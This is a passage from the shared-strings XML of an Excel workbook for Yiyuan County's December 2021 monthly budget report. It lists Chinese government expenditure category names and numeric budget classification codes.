  <si>
    <t xml:space="preserve">      其他可再生能源电价附加收入安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">      回收处理费用补贴</t>
  </si>
  <si>
    <t xml:space="preserve">      信息系统建设</t>
  </si>
  <si>
    <t xml:space="preserve">      基金征管经费</t>
  </si>
  <si>
    <t xml:space="preserve">      其他废弃电器电子产品处理基金支出</t>
  </si>
  <si>
    <t xml:space="preserve">      征地和拆迁补偿支出</t>
  </si>
  <si>
    <t xml:space="preserve">      土地开发支出</t>
  </si>
  <si>
    <t xml:space="preserve">      城市建设支出</t>
  </si>
  <si>
    <t xml:space="preserve">      农村基础设施建设支出</t>
  </si>
  <si>
    <t xml:space="preserve">      补助被征地农民支出</t>
  </si>
  <si>
    <t xml:space="preserve">      土地出让业务支出</t>
  </si>
  <si>
    <t xml:space="preserve">      廉租住房支出</t>
  </si>
  <si>
    <t xml:space="preserve">      支付破产或改制企业职工安置费</t>
  </si>
  <si>
    <t xml:space="preserve">      棚户区改造支出</t>
  </si>
  <si>
    <t xml:space="preserve">      公共租赁住房支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他国有土地使用权出让收入安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他国有土地收益基金支出</t>
  </si>
  <si>
    <t xml:space="preserve">      城市公共设施</t>
  </si>
  <si>
    <t xml:space="preserve">      城市环境卫生</t>
  </si>
  <si>
    <t xml:space="preserve">      公有房屋</t>
  </si>
  <si>
    <t xml:space="preserve">      城市防洪</t>
  </si>
  <si>
    <t xml:space="preserve">      其他城市基础设施配套费安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">      污水处理设施建设和运营</t>
  </si>
  <si>
    <t xml:space="preserve">      代征手续费</t>
  </si>
  <si>
    <t xml:space="preserve">      其他污水处理费安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他土地储备专项债券收入安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他棚户区改造专项债券收入安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他城市基础设施配套费对应专项债务收入安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他污水处理费对应专项债务收入安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他国有土地使用权出让收入对应专项债务收入安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">    大中型水库库区基金安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">      解决移民遗留问题</t>
  </si>
  <si>
    <t xml:space="preserve">      库区防护工程维护</t>
  </si>
  <si>
    <t xml:space="preserve">      其他大中型水库库区基金支出</t>
  </si>
  <si>
    <t xml:space="preserve">    三峡水库库区基金支出</t>
  </si>
  <si>
    <t xml:space="preserve">      库区维护和管理</t>
  </si>
  <si>
    <t xml:space="preserve">      其他三峡水库库区基金支出</t>
  </si>
  <si>
    <t xml:space="preserve">    国家重大水利工程建设基金安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">      三峡后续工作</t>
  </si>
  <si>
    <t xml:space="preserve">      地方重大水利工程建设</t>
  </si>
  <si>
    <t xml:space="preserve">      其他重大水利工程建设基金支出</t>
  </si>
  <si>
    <t xml:space="preserve">    大中型水库库区基金对应专项债务收入安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他大中型水库库区基金对应专项债务收入支出</t>
  </si>
  <si>
    <t xml:space="preserve">    国家重大水利工程建设基金对应专项债务收入安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">      三峡工程后续工作</t>
  </si>
  <si>
    <t xml:space="preserve">      其他重大水利工程建设基金对应专项债务收入支出</t>
  </si>
  <si>
    <t xml:space="preserve">      公路还贷</t>
  </si>
  <si>
    <t xml:space="preserve">      其他海南省高等级公路车辆通行附加费安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">      政府还贷公路养护</t>
  </si>
  <si>
    <t xml:space="preserve">      政府还贷公路管理</t>
  </si>
  <si>
    <t xml:space="preserve">      其他车辆通行费安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">      航道建设和维护</t>
  </si>
  <si>
    <t xml:space="preserve">      航运保障系统建设</t>
  </si>
  <si>
    <t xml:space="preserve">      其他港口建设费安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">      铁路建设投资</t>
  </si>
  <si>
    <t xml:space="preserve">      购置铁路机车车辆</t>
  </si>
  <si>
    <t xml:space="preserve">      铁路还贷</t>
  </si>
  <si>
    <t xml:space="preserve">      建设项目铺底资金</t>
  </si>
  <si>
    <t xml:space="preserve">      勘测设计</t>
  </si>
  <si>
    <t xml:space="preserve">      注册资本金</t>
  </si>
  <si>
    <t xml:space="preserve">      周转资金</t>
  </si>
  <si>
    <t xml:space="preserve">      其他铁路建设基金支出</t>
  </si>
  <si>
    <t xml:space="preserve">      应急处置费用</t>
  </si>
  <si>
    <t xml:space="preserve">      控制清除污染</t>
  </si>
  <si>
    <t xml:space="preserve">      损失补偿</t>
  </si>
  <si>
    <t xml:space="preserve">      生态恢复</t>
  </si>
  <si>
    <t xml:space="preserve">      监视监测</t>
  </si>
  <si>
    <t xml:space="preserve">      其他船舶油污损害赔偿基金支出</t>
  </si>
  <si>
    <t xml:space="preserve">      民航机场建设</t>
  </si>
  <si>
    <t xml:space="preserve">      民航安全</t>
  </si>
  <si>
    <t xml:space="preserve">      航线和机场补贴</t>
  </si>
  <si>
    <t xml:space="preserve">      民航节能减排</t>
  </si>
  <si>
    <t xml:space="preserve">      通用航空发展</t>
  </si>
  <si>
    <t xml:space="preserve">      征管经费</t>
  </si>
  <si>
    <t xml:space="preserve">      其他民航发展基金支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他海南省高等级公路车辆通行附加费对应专项债务收入安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">    政府收费公路专项债券收入安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他政府收费公路专项债券收入安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">    车辆通行费对应专项债务收入安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">    港口建设费对应专项债务收入安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他港口建设费对应专项债务收入安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">    农网还贷资金支出</t>
  </si>
  <si>
    <t xml:space="preserve">      中央农网还贷资金支出</t>
  </si>
  <si>
    <t xml:space="preserve">      地方农网还贷资金支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他农网还贷资金支出</t>
  </si>
  <si>
    <t xml:space="preserve">      中央特别国债经营基金支出</t>
  </si>
  <si>
    <t xml:space="preserve">      中央特别国债经营基金财务支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他政府性基金安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他地方自行试点项目收益专项债券收入安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他政府性基金债务收入安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">      福利彩票发行机构的业务费支出</t>
  </si>
  <si>
    <t xml:space="preserve">      体育彩票发行机构的业务费支出</t>
  </si>
  <si>
    <t xml:space="preserve">      福利彩票销售机构的业务费支出</t>
  </si>
  <si>
    <t xml:space="preserve">      体育彩票销售机构的业务费支出</t>
  </si>
  <si>
    <t xml:space="preserve">      彩票兑奖周转金支出</t>
  </si>
  <si>
    <t xml:space="preserve">      彩票发行销售风险基金支出</t>
  </si>
  <si>
    <t xml:space="preserve">      彩票市场调控资金支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他彩票发行销售机构业务费安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">      用于补充全国社会保障基金的彩票公益金支出</t>
  </si>
  <si>
    <t xml:space="preserve">      用于社会福利的彩票公益金支出</t>
  </si>
  <si>
    <t xml:space="preserve">      用于体育事业的彩票公益金支出</t>
  </si>
  <si>
    <t xml:space="preserve">      用于教育事业的彩票公益金支出</t>
  </si>
  <si>
    <t xml:space="preserve">      用于红十字事业的彩票公益金支出</t>
  </si>
  <si>
    <t xml:space="preserve">      用于残疾人事业的彩票公益金支出</t>
  </si>
  <si>
    <t xml:space="preserve">      用于文化事业的彩票公益金支出</t>
  </si>
  <si>
    <t xml:space="preserve">      用于扶贫的彩票公益金支出</t>
  </si>
  <si>
    <t xml:space="preserve">      用于法律援助的彩票公益金支出</t>
  </si>
  <si>
    <t xml:space="preserve">      用于城乡医疗救助的彩票公益金支出</t>
  </si>
  <si>
    <t xml:space="preserve">      用于其他社会公益事业的彩票公益金支出</t>
  </si>
  <si>
    <t xml:space="preserve">    地方政府专项债务付息支出</t>
  </si>
  <si>
    <t xml:space="preserve">      海南省高等级公路车辆通行附加费债务付息支出</t>
  </si>
  <si>
    <t xml:space="preserve">      港口建设费债务付息支出</t>
  </si>
  <si>
    <t xml:space="preserve">      国家电影事业发展专项资金债务付息支出</t>
  </si>
  <si>
    <t xml:space="preserve">      国有土地使用权出让金债务付息支出</t>
  </si>
  <si>
    <t xml:space="preserve">      农业土地开发资金债务付息支出</t>
  </si>
  <si>
    <t xml:space="preserve">      大中型水库库区基金债务付息支出</t>
  </si>
  <si>
    <t xml:space="preserve">      城市基础设施配套费债务付息支出</t>
  </si>
  <si>
    <t xml:space="preserve">      小型水库移民扶助基金债务付息支出</t>
  </si>
  <si>
    <t xml:space="preserve">      国家重大水利工程建设基金债务付息支出</t>
  </si>
  <si>
    <t xml:space="preserve">      车辆通行费债务付息支出</t>
  </si>
  <si>
    <t xml:space="preserve">      污水处理费债务付息支出</t>
  </si>
  <si>
    <t xml:space="preserve">      土地储备专项债券付息支出</t>
  </si>
  <si>
    <t xml:space="preserve">      政府收费公路专项债券付息支出</t>
  </si>
  <si>
    <t xml:space="preserve">      棚户区改造专项债券付息支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他地方自行试点项目收益专项债券付息支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他政府性基金债务付息支出</t>
  </si>
  <si>
    <t xml:space="preserve">    地方政府专项债务发行费用支出</t>
  </si>
  <si>
    <t xml:space="preserve">      海南省高等级公路车辆通行附加费债务发行费用支出</t>
  </si>
  <si>
    <t xml:space="preserve">      港口建设费债务发行费用支出</t>
  </si>
  <si>
    <t xml:space="preserve">      国家电影事业发展专项资金债务发行费用支出</t>
  </si>
  <si>
    <t xml:space="preserve">      国有土地使用权出让金债务发行费用支出</t>
  </si>
  <si>
    <t xml:space="preserve">      农业土地开发资金债务发行费用支出</t>
  </si>
  <si>
    <t xml:space="preserve">      大中型水库库区基金债务发行费用支出</t>
  </si>
  <si>
    <t xml:space="preserve">      城市基础设施配套费债务发行费用支出</t>
  </si>
  <si>
    <t xml:space="preserve">      小型水库移民扶助基金债务发行费用支出</t>
  </si>
  <si>
    <t xml:space="preserve">      国家重大水利工程建设基金债务发行费用支出</t>
  </si>
  <si>
    <t xml:space="preserve">      车辆通行费债务发行费用支出</t>
  </si>
  <si>
    <t xml:space="preserve">      污水处理费债务发行费用支出</t>
  </si>
  <si>
    <t xml:space="preserve">      土地储备专项债券发行费用支出</t>
  </si>
  <si>
    <t xml:space="preserve">      政府收费公路专项债券发行费用支出</t>
  </si>
  <si>
    <t xml:space="preserve">      棚户区改造专项债券发行费用支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他地方自行试点项目收益专项债券发行费用支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他政府性基金债务发行费用支出</t>
  </si>
  <si>
    <t xml:space="preserve"> 抗疫特别国债安排的支出</t>
  </si>
  <si>
    <t xml:space="preserve">   基础设施建设</t>
  </si>
  <si>
    <t xml:space="preserve">     公共卫生体系建设</t>
  </si>
  <si>
    <t xml:space="preserve">     重大疫情防控救治体系建设</t>
  </si>
  <si>
    <t xml:space="preserve">     粮食安全</t>
  </si>
  <si>
    <t xml:space="preserve">     能源安全</t>
  </si>
  <si>
    <t xml:space="preserve">     应急物资保障</t>
  </si>
  <si>
    <t xml:space="preserve">     产业链改造升级</t>
  </si>
  <si>
    <t xml:space="preserve">     城镇老旧小区改造</t>
  </si>
  <si>
    <t xml:space="preserve">     生态环境治理</t>
  </si>
  <si>
    <t xml:space="preserve">     交通基础设施建设</t>
  </si>
  <si>
    <t xml:space="preserve">     市政设施建设</t>
  </si>
  <si>
    <t xml:space="preserve">     重大区域规划基础设施建设</t>
  </si>
  <si>
    <t xml:space="preserve">     其他基础设施建设</t>
  </si>
  <si>
    <t xml:space="preserve">   抗疫相关支出</t>
  </si>
  <si>
    <t xml:space="preserve">     减免房租补贴</t>
  </si>
  <si>
    <t xml:space="preserve">     重点企业贷款贴息</t>
  </si>
  <si>
    <t xml:space="preserve">     创业担保贷款贴息</t>
  </si>
  <si>
    <t xml:space="preserve">     援企稳岗补贴</t>
  </si>
  <si>
    <t xml:space="preserve">     困难群众基本生活补助</t>
  </si>
  <si>
    <t xml:space="preserve">     其他抗疫相关支出</t>
  </si>
  <si>
    <t>国有资本经营预算支出合计</t>
  </si>
  <si>
    <t xml:space="preserve">      国有资本经营预算补充社保基金支出</t>
  </si>
  <si>
    <t xml:space="preserve">  国有资本经营预算支出</t>
  </si>
  <si>
    <t xml:space="preserve">    解决历史遗留问题及改革成本支出</t>
  </si>
  <si>
    <t xml:space="preserve">      厂办大集体改革支出</t>
  </si>
  <si>
    <t xml:space="preserve">      “三供一业”移交补助支出</t>
  </si>
  <si>
    <t xml:space="preserve">      国有企业办职教幼教补助支出</t>
  </si>
  <si>
    <t xml:space="preserve">      国有企业办公共服务机构移交补助支出</t>
  </si>
  <si>
    <t xml:space="preserve">      国有企业退休人员社会化管理补助支出</t>
  </si>
  <si>
    <t xml:space="preserve">      国有企业棚户区改造支出</t>
  </si>
  <si>
    <t xml:space="preserve">      国有企业改革成本支出</t>
  </si>
  <si>
    <t xml:space="preserve">      离休干部医药费补助支出</t>
  </si>
  <si>
    <t xml:space="preserve">      金融企业改革性支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他解决历史遗留问题及改革成本支出</t>
  </si>
  <si>
    <t xml:space="preserve">    国有企业资本金注入</t>
  </si>
  <si>
    <t xml:space="preserve">      国有经济结构调整支出</t>
  </si>
  <si>
    <t xml:space="preserve">      公益性设施投资支出</t>
  </si>
  <si>
    <t xml:space="preserve">      前瞻性战略性产业发展支出</t>
  </si>
  <si>
    <t xml:space="preserve">      生态环境保护支出</t>
  </si>
  <si>
    <t xml:space="preserve">      支持科技进步支出</t>
  </si>
  <si>
    <t xml:space="preserve">      保障国家经济安全支出</t>
  </si>
  <si>
    <t xml:space="preserve">      对外投资合作支出</t>
  </si>
  <si>
    <t xml:space="preserve">      金融企业资本性支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他国有企业资本金注入</t>
  </si>
  <si>
    <t xml:space="preserve">    国有企业政策性补贴</t>
  </si>
  <si>
    <t xml:space="preserve">      国有企业政策性补贴</t>
  </si>
  <si>
    <t xml:space="preserve">    其他国有资本经营预算支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他国有资本经营预算支出</t>
  </si>
  <si>
    <t xml:space="preserve">  债务还本支出</t>
  </si>
  <si>
    <t xml:space="preserve">    中央政府国内债务还本支出</t>
  </si>
  <si>
    <t xml:space="preserve">    中央政府国外债务还本支出</t>
  </si>
  <si>
    <t xml:space="preserve">    地方政府一般债务还本支出</t>
  </si>
  <si>
    <t xml:space="preserve">      地方政府一般债券还本支出</t>
  </si>
  <si>
    <t xml:space="preserve">      地方政府向外国政府借款还本支出</t>
  </si>
  <si>
    <t xml:space="preserve">      地方政府向国际组织借款还本支出</t>
  </si>
  <si>
    <t xml:space="preserve">      地方政府其他一般债务还本支出</t>
  </si>
  <si>
    <t xml:space="preserve">    地方政府专项债务还本支出</t>
  </si>
  <si>
    <t xml:space="preserve">      海南省高等级公路车辆通行附加费债务还本支出</t>
  </si>
  <si>
    <t xml:space="preserve">      港口建设费债务还本支出</t>
  </si>
  <si>
    <t xml:space="preserve">      国家电影事业发展专项资金债务还本支出</t>
  </si>
  <si>
    <t xml:space="preserve">      国有土地使用权出让金债务还本支出</t>
  </si>
  <si>
    <t xml:space="preserve">      农业土地开发资金债务还本支出</t>
  </si>
  <si>
    <t xml:space="preserve">      大中型水库库区基金债务还本支出</t>
  </si>
  <si>
    <t xml:space="preserve">      城市基础设施配套费债务还本支出</t>
  </si>
  <si>
    <t xml:space="preserve">      小型水库移民扶助基金债务还本支出</t>
  </si>
  <si>
    <t xml:space="preserve">      国家重大水利工程建设基金债务还本支出</t>
  </si>
  <si>
    <t xml:space="preserve">      车辆通行费债务还本支出</t>
  </si>
  <si>
    <t xml:space="preserve">      污水处理费债务还本支出</t>
  </si>
  <si>
    <t xml:space="preserve">      土地储备专项债券还本支出</t>
  </si>
  <si>
    <t xml:space="preserve">      政府收费公路专项债券还本支出</t>
  </si>
  <si>
    <t xml:space="preserve">      棚户区改造专项债券还本支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他地方自行试点项目收益专项债券还本支出</t>
  </si>
  <si>
    <t xml:space="preserve">      其他政府性基金债务还本支出</t>
  </si>
  <si>
    <t xml:space="preserve">    抗疫特别国债还本支出</t>
  </si>
  <si>
    <t>2021年12月沂源县预算收支月报</t>
  </si>
  <si>
    <t>101</t>
  </si>
  <si>
    <t>201</t>
  </si>
  <si>
    <t>1010101</t>
  </si>
  <si>
    <t>20101</t>
  </si>
  <si>
    <t>101010101</t>
  </si>
  <si>
    <t>2010101</t>
  </si>
  <si>
    <t>101010102</t>
  </si>
  <si>
    <t>2010102</t>
  </si>
  <si>
    <t>101010103</t>
  </si>
  <si>
    <t>2010103</t>
  </si>
  <si>
    <t>101010104</t>
  </si>
  <si>
    <t>2010104</t>
  </si>
  <si>
    <t>101010105</t>
  </si>
  <si>
    <t>2010105</t>
  </si>
  <si>
    <t>101010106</t>
  </si>
  <si>
    <t>2010106</t>
  </si>
  <si>
    <t>101010117</t>
  </si>
  <si>
    <t>2010107</t>
  </si>
  <si>
    <t>101010118</t>
  </si>
  <si>
    <t>2010108</t>
  </si>
  <si>
    <t>101010119</t>
  </si>
  <si>
    <t>2010109</t>
  </si>
  <si>
    <t>101010120</t>
  </si>
  <si>
    <t>2010150</t>
  </si>
  <si>
    <t>101010121</t>
  </si>
  <si>
    <t>2010199</t>
  </si>
  <si>
    <t>101010122</t>
  </si>
  <si>
    <t>20102</t>
  </si>
  <si>
    <t>101010125</t>
  </si>
  <si>
    <t>2010201</t>
  </si>
  <si>
    <t>101010127</t>
  </si>
  <si>
    <t>2010202</t>
  </si>
  <si>
    <t>101010129</t>
  </si>
  <si>
    <t>2010203</t>
  </si>
  <si>
    <t>101010130</t>
  </si>
  <si>
    <t>2010204</t>
  </si>
  <si>
    <t>101010131</t>
  </si>
  <si>
    <t>2010205</t>
  </si>
  <si>
    <t>101010132</t>
  </si>
  <si>
    <t>2010206</t>
  </si>
  <si>
    <t>101010133</t>
  </si>
  <si>
    <t>2010250</t>
  </si>
  <si>
    <t>101010134</t>
  </si>
  <si>
    <t>2010299</t>
  </si>
  <si>
    <t>101010135</t>
  </si>
  <si>
    <t>20103</t>
  </si>
  <si>
    <t>101010136</t>
  </si>
  <si>
    <t>2010301</t>
  </si>
  <si>
    <t>101010137</t>
  </si>
  <si>
    <t>2010302</t>
  </si>
  <si>
    <t>101010138</t>
  </si>
  <si>
    <t>2010303</t>
  </si>
  <si>
    <t>101010150</t>
  </si>
  <si>
    <t>2010304</t>
  </si>
  <si>
    <t>101010151</t>
  </si>
  <si>
    <t>2010305</t>
  </si>
  <si>
    <t>101010152</t>
  </si>
  <si>
    <t>2010306</t>
  </si>
  <si>
    <t>101010153</t>
  </si>
  <si>
    <t>2010308</t>
  </si>
  <si>
    <t>1010201</t>
  </si>
  <si>
    <t>2010309</t>
  </si>
  <si>
    <t>101020107</t>
  </si>
  <si>
    <t>2010350</t>
  </si>
  <si>
    <t>101020121</t>
  </si>
  <si>
    <t>2010399</t>
  </si>
  <si>
    <t>20104</t>
  </si>
  <si>
    <t>1010102</t>
  </si>
  <si>
    <t>2010401</t>
  </si>
  <si>
    <t>1010202</t>
  </si>
  <si>
    <t>2010402</t>
  </si>
  <si>
    <t>101020202</t>
  </si>
  <si>
    <t>2010403</t>
  </si>
  <si>
    <t>101020221</t>
  </si>
  <si>
    <t>2010404</t>
  </si>
  <si>
    <t>2010405</t>
  </si>
  <si>
    <t>1010103</t>
  </si>
  <si>
    <t>2010406</t>
  </si>
  <si>
    <t>101010301</t>
  </si>
  <si>
    <t>2010407</t>
  </si>
  <si>
    <t>101010302</t>
  </si>
  <si>
    <t>2010408</t>
  </si>
  <si>
    <t>1010203</t>
  </si>
  <si>
    <t>2010450</t>
  </si>
  <si>
    <t>10104</t>
  </si>
  <si>
    <t>2010499</t>
  </si>
  <si>
    <t>1010401</t>
  </si>
  <si>
    <t>20105</t>
  </si>
  <si>
    <t>1010402</t>
  </si>
  <si>
    <t>2010501</t>
  </si>
  <si>
    <t>1010403</t>
  </si>
  <si>
    <t>2010502</t>
  </si>
  <si>
    <t>1010404</t>
  </si>
  <si>
    <t>2010503</t>
  </si>
  <si>
    <t>1010405</t>
  </si>
  <si>
    <t>2010504</t>
  </si>
  <si>
    <t>1010406</t>
  </si>
  <si>
    <t>2010505</t>
  </si>
  <si>
    <t>1010407</t>
  </si>
  <si>
    <t>2010506</t>
  </si>
  <si>
    <t>1010408</t>
  </si>
  <si>
    <t>2010507</t>
  </si>
  <si>
    <t>1010409</t>
  </si>
  <si>
    <t>2010508</t>
  </si>
  <si>
    <t>1010410</t>
  </si>
  <si>
    <t>2010550</t>
  </si>
  <si>
    <t>1010411</t>
  </si>
  <si>
    <t>2010599</t>
  </si>
  <si>
    <t>1010412</t>
  </si>
  <si>
    <t>20106</t>
  </si>
  <si>
    <t>1010413</t>
  </si>
  <si>
    <t>2010601</t>
  </si>
  <si>
    <t>1010414</t>
  </si>
  <si>
    <t>2010602</t>
  </si>
  <si>
    <t>1010415</t>
  </si>
  <si>
    <t>2010603</t>
  </si>
  <si>
    <t>1010416</t>
  </si>
  <si>
    <t>2010604</t>
  </si>
  <si>
    <t>1010417</t>
  </si>
  <si>
    <t>2010605</t>
  </si>
  <si>
    <t>101041702</t>
  </si>
  <si>
    <t>2010606</t>
  </si>
  <si>
    <t>1010418</t>
  </si>
  <si>
    <t>2010607</t>
  </si>
  <si>
    <t>1010419</t>
  </si>
  <si>
    <t>2010608</t>
  </si>
  <si>
    <t>1010420</t>
  </si>
  <si>
    <t>2010650</t>
  </si>
  <si>
    <t>1010421</t>
  </si>
  <si>
    <t>2010699</t>
  </si>
  <si>
    <t>1010422</t>
  </si>
  <si>
    <t>20107</t>
  </si>
  <si>
    <t>1010423</t>
  </si>
  <si>
    <t>2010701</t>
  </si>
  <si>
    <t>1010424</t>
  </si>
  <si>
    <t>2010702</t>
  </si>
  <si>
    <t>1010425</t>
  </si>
  <si>
    <t>2010703</t>
  </si>
  <si>
    <t>1010426</t>
  </si>
  <si>
    <t>2010709</t>
  </si>
  <si>
    <t>1010427</t>
  </si>
  <si>
    <t>2010710</t>
  </si>
  <si>
    <t>1010428</t>
  </si>
  <si>
    <t>2010750</t>
  </si>
  <si>
    <t>1010429</t>
  </si>
  <si>
    <t>2010799</t>
  </si>
  <si>
    <t>1010430</t>
  </si>
  <si>
    <t>20108</t>
  </si>
  <si>
    <t>1010431</t>
  </si>
  <si>
    <t>2010801</t>
  </si>
  <si>
    <t>1010432</t>
  </si>
  <si>
    <t>2010802</t>
  </si>
  <si>
    <t>1010433</t>
  </si>
  <si>
    <t>2010803</t>
  </si>
  <si>
    <t>1010434</t>
  </si>
  <si>
    <t>2010804</t>
  </si>
  <si>
    <t>1010435</t>
  </si>
  <si>
    <t>2010805</t>
  </si>
  <si>
    <t>1010436</t>
  </si>
  <si>
    <t>2010806</t>
  </si>
  <si>
    <t>1010439</t>
  </si>
  <si>
    <t>2010850</t>
  </si>
  <si>
    <t>1010440</t>
  </si>
  <si>
    <t>2010899</t>
  </si>
  <si>
    <t>1010441</t>
  </si>
  <si>
    <t>20109</t>
  </si>
  <si>
    <t>1010442</t>
  </si>
  <si>
    <t>2010901</t>
  </si>
  <si>
    <t>1010443</t>
  </si>
  <si>
    <t>2010902</t>
  </si>
  <si>
    <t>1010444</t>
  </si>
  <si>
    <t>2010903</t>
  </si>
  <si>
    <t>1010445</t>
  </si>
  <si>
    <t>2010905</t>
  </si>
  <si>
    <t>1010446</t>
  </si>
  <si>
    <t>2010907</t>
  </si>
  <si>
    <t>1010447</t>
  </si>
  <si>
    <t>2010908</t>
  </si>
  <si>
    <t>1010448</t>
  </si>
  <si>
    <t>2010909</t>
  </si>
  <si>
    <t>1010449</t>
  </si>
  <si>
    <t>2010910</t>
  </si>
  <si>
    <t>1010450</t>
  </si>
  <si>
    <t>2010911</t>
  </si>
  <si>
    <t>10105</t>
  </si>
  <si>
    <t>2010912</t>
  </si>
  <si>
    <t>2010950</t>
  </si>
  <si>
    <t>1010601</t>
  </si>
  <si>
    <t>2010999</t>
  </si>
  <si>
    <t>101060101</t>
  </si>
  <si>
    <t>20111</t>
  </si>
  <si>
    <t>101060102</t>
  </si>
  <si>
    <t>2011101</t>
  </si>
  <si>
    <t>101060109</t>
  </si>
  <si>
    <t>2011102</t>
  </si>
  <si>
    <t>1010602</t>
  </si>
  <si>
    <t>2011103</t>
  </si>
  <si>
    <t>1010603</t>
  </si>
  <si>
    <t>2011104</t>
  </si>
  <si>
    <t>1010620</t>
  </si>
  <si>
    <t>2011105</t>
  </si>
  <si>
    <t>10107</t>
  </si>
  <si>
    <t>2011106</t>
  </si>
  <si>
    <t>1010701</t>
  </si>
  <si>
    <t>2011150</t>
  </si>
  <si>
    <t>1010702</t>
  </si>
  <si>
    <t>2011199</t>
  </si>
  <si>
    <t>1010719</t>
  </si>
  <si>
    <t>20113</t>
  </si>
  <si>
    <t>1010720</t>
  </si>
  <si>
    <t>2011301</t>
  </si>
  <si>
    <t>10109</t>
  </si>
  <si>
    <t>2011302</t>
  </si>
  <si>
    <t>1010918</t>
  </si>
  <si>
    <t>2011303</t>
  </si>
  <si>
    <t>1010921</t>
  </si>
  <si>
    <t>2011304</t>
  </si>
  <si>
    <t>1010922</t>
  </si>
  <si>
    <t>2011305</t>
  </si>
  <si>
    <t>10110</t>
  </si>
  <si>
    <t>2011306</t>
  </si>
  <si>
    <t>10111</t>
  </si>
  <si>
    <t>2011307</t>
  </si>
  <si>
    <t>1011101</t>
  </si>
  <si>
    <t>2011308</t>
  </si>
  <si>
    <t>10112</t>
  </si>
  <si>
    <t>2011350</t>
  </si>
  <si>
    <t>10113</t>
  </si>
  <si>
    <t>2011399</t>
  </si>
  <si>
    <t>10114</t>
  </si>
  <si>
    <t>20114</t>
  </si>
  <si>
    <t>10115</t>
  </si>
  <si>
    <t>2011401</t>
  </si>
  <si>
    <t>10116</t>
  </si>
  <si>
    <t>2011402</t>
  </si>
  <si>
    <t>10117</t>
  </si>
  <si>
    <t>2011403</t>
  </si>
  <si>
    <t>10118</t>
  </si>
  <si>
    <t>2011404</t>
  </si>
  <si>
    <t>10119</t>
  </si>
  <si>
    <t>2011405</t>
  </si>
  <si>
    <t>10120</t>
  </si>
  <si>
    <t>2011408</t>
  </si>
  <si>
    <t>10121</t>
  </si>
  <si>
    <t>2011409</t>
  </si>
  <si>
    <t>10199</t>
  </si>
  <si>
    <t>2011410</t>
  </si>
  <si>
    <t>103</t>
  </si>
  <si>
    <t>2011411</t>
  </si>
  <si>
    <t>10302</t>
  </si>
  <si>
    <t>2011450</t>
  </si>
  <si>
    <t>1030203</t>
  </si>
  <si>
    <t>2011499</t>
  </si>
  <si>
    <t>103020301</t>
  </si>
  <si>
    <t>20123</t>
  </si>
  <si>
    <t>103020302</t>
  </si>
  <si>
    <t>2012301</t>
  </si>
  <si>
    <t>103020303</t>
  </si>
  <si>
    <t>2012302</t>
  </si>
  <si>
    <t>103020304</t>
  </si>
  <si>
    <t>2012303</t>
  </si>
  <si>
    <t>103020305</t>
  </si>
  <si>
    <t>2012304</t>
  </si>
  <si>
    <t>103020399</t>
  </si>
  <si>
    <t>2012350</t>
  </si>
  <si>
    <t>1030205</t>
  </si>
  <si>
    <t>2012399</t>
  </si>
  <si>
    <t>1030210</t>
  </si>
  <si>
    <t>20125</t>
  </si>
  <si>
    <t>1030212</t>
  </si>
  <si>
    <t>2012501</t>
  </si>
  <si>
    <t>1030216</t>
  </si>
  <si>
    <t>2012502</t>
  </si>
  <si>
    <t>1030217</t>
  </si>
  <si>
    <t>2012503</t>
  </si>
  <si>
    <t>1030218</t>
  </si>
  <si>
    <t>2012504</t>
  </si>
  <si>
    <t>1030219</t>
  </si>
  <si>
    <t>2012505</t>
  </si>
  <si>
    <t>1030220</t>
  </si>
  <si>
    <t>2012550</t>
  </si>
  <si>
    <t>1030222</t>
  </si>
  <si>
    <t>2012599</t>
  </si>
  <si>
    <t>1030223</t>
  </si>
  <si>
    <t>20126</t>
  </si>
  <si>
    <t>1030224</t>
  </si>
  <si>
    <t>2012601</t>
  </si>
  <si>
    <t>1030225</t>
  </si>
  <si>
    <t>2012602</t>
  </si>
  <si>
    <t>1030299</t>
  </si>
  <si>
    <t>2012603</t>
  </si>
  <si>
    <t>103029901</t>
  </si>
  <si>
    <t>2012604</t>
  </si>
  <si>
    <t>103029999</t>
  </si>
  <si>
    <t>2012699</t>
  </si>
  <si>
    <t>10304</t>
  </si>
  <si>
    <t>20128</t>
  </si>
  <si>
    <t>1030401</t>
  </si>
  <si>
    <t>2012801</t>
  </si>
  <si>
    <t>1030402</t>
  </si>
  <si>
    <t>2012802</t>
  </si>
  <si>
    <t>1030403</t>
  </si>
  <si>
    <t>2012803</t>
  </si>
  <si>
    <t>1030404</t>
